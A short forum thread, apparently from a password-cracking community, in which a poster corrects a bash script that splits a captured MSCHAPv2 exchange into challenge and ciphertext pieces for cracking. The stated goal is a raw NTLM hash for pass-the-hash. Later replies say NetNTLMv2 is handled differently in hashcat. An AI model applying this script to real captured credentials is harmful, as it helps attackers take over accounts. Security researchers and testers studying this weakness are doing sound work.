Reversing MSCHAPv2 to NTLM
#11
I screwed up in my post:

Step 9) EvilMog writes a script to use atoms script to generate a raw NTLM hash for use in PTH

#!/bin/bash

challenge=$(echo -n "$1" | base64 -d | xxd | head -n1 | cut -d " " -f2-5 | sed 's/ //g')
ct2=$(echo -n "$1" | base64 -d | xxd | tail -n1 | cut -d " " -f2-5 | sed 's/ //g')
pt3=$(echo -n "$1" | base64 -d | xxd | tail -n1 |cut -d " " -f6-7 | sed 's/ //g')
ct1=$(echo -n "$1" | base64 -d | xxd | head -n 1 | cut -d " " -f6-9 | sed 's/ //g')
echo $ct1:$challenge > hashes.txt
echo $ct2$challenge >> hashes.txt
echo $pt3 > pt3.txt


the screwup is in 'echo $ct2$challenge' >> hashes.txt it should be 'echo $ct2:$challenge >> hashes.txt'

The corrected script is:

#!/bin/bash

challenge=$(echo -n "$1" | base64 -d | xxd | head -n1 | cut -d " " -f2-5 | sed 's/ //g')
ct2=$(echo -n "$1" | base64 -d | xxd | tail -n1 | cut -d " " -f2-5 | sed 's/ //g')
pt3=$(echo -n "$1" | base64 -d | xxd | tail -n1 |cut -d " " -f6-7 | sed 's/ //g')
ct1=$(echo -n "$1" | base64 -d | xxd | head -n 1 | cut -d " " -f6-9 | sed 's/ //g')
echo $ct1:$challenge > hashes.txt
echo $ct2:$challenge >> hashes.txt
echo $pt3 > pt3.txt
Reply
#12
Is this process the same for NetNtlmV2?
Reply
#13
No, netntlmv2 is completely different and has a dedicated hash-mode in hashcat.
Reply